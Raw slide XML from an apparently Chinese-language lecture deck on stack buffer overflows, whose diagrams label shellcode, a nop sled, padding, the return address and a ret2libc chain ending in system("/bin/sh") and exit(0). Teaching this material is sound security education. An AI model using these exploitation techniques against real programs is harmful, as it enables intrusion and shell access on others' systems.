                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 的地址，最终调用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>libc</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中的函数获取 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="矩形 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48E567E0-7103-4116-BA78-1A8F51CB386D}"/>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ret2libc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296569562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414"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1416" name="Shape 1416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="22002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char **argv</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1417" name="Shape 1417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="2609800"/>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int argc</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1418" name="Shape 1418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3019400"/>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shellcode addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1419" name="Shape 1419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3429000"/>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shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1420" name="Shape 1420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3838600"/>
            <a:ext cx="2095200" cy="162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nop sled</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1421" name="Shape 1421"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1418" idx="3"/>
            <a:endCxn id="1420" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284694" y="3224200"/>
            <a:ext cx="800" cy="1428000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39687500"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1422" name="Shape 1422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1814194" y="3065133"/>
            <a:ext cx="0" cy="2397200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1423" name="Shape 1423"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078060" y="3823700"/>
            <a:ext cx="9938400" cy="30400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1424" name="Shape 1424"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479060" y="3321366"/>
            <a:ext cx="1183600" cy="409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Overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1425" name="Shape 1425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="2206000"/>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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1426" name="Shape 1426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="2615600"/>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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1427" name="Shape 1427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="3025200"/>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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1428" name="Shape 1428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="3434800"/>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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1429" name="Shape 1429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="3844400"/>
            <a:ext cx="2095200" cy="162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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1430" name="Shape 1430"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="1796400"/>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0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1431" name="Shape 1431"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5226260" y="3025200"/>
            <a:ext cx="1282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return</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1432" name="Shape 1432"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="3"/>
            <a:endCxn id="1427" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509060" y="3230000"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1433" name="Shape 1433"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1431" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4641060" y="3230000"/>
            <a:ext cx="585200" cy="17200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1434" name="Shape 1434"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9411527" y="1821133"/>
            <a:ext cx="21200" cy="3641200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1435" name="Shape 1435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509960" y="3321366"/>
            <a:ext cx="1183600" cy="409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Overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1436" name="Shape 1436"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509960" y="1739333"/>
            <a:ext cx="2496800" cy="911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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1437" name="Shape 1437"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255460" y="1990333"/>
            <a:ext cx="1630800" cy="409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high address</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1438" name="Shape 1438"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="255460" y="5061600"/>
            <a:ext cx="1630800" cy="409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low address</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE79ABDA-DE19-4990-B8CC-CA9DDE838390}"/>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ret2libc</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442"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1444" name="Shape 1444"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="24940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"/bin/sh"</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1445" name="Shape 1445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="29036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exit</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1446" name="Shape 1446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="33132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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1447" name="Shape 1447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="37228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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1448" name="Shape 1448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="4132467"/>
            <a:ext cx="2095200" cy="162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padding</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1449" name="Shape 1449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7106500" y="20844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0</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1450" name="Shape 1450"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671600" y="3518067"/>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ESP</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1451" name="Shape 1451"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6568867" y="3722867"/>
            <a:ext cx="537600" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1452" name="Shape 1452"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9471400" y="2109200"/>
            <a:ext cx="21200" cy="3641200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1453" name="Shape 1453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="3609433"/>
            <a:ext cx="1183600" cy="409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Overflow</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1454" name="Shape 1454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9569833" y="2027400"/>
            <a:ext cx="2496800" cy="911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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system("/bin/sh")</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>exit(0)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1455" name="Shape 1455"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1789867" y="3819267"/>
            <a:ext cx="2882800" cy="25044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t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>system:</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
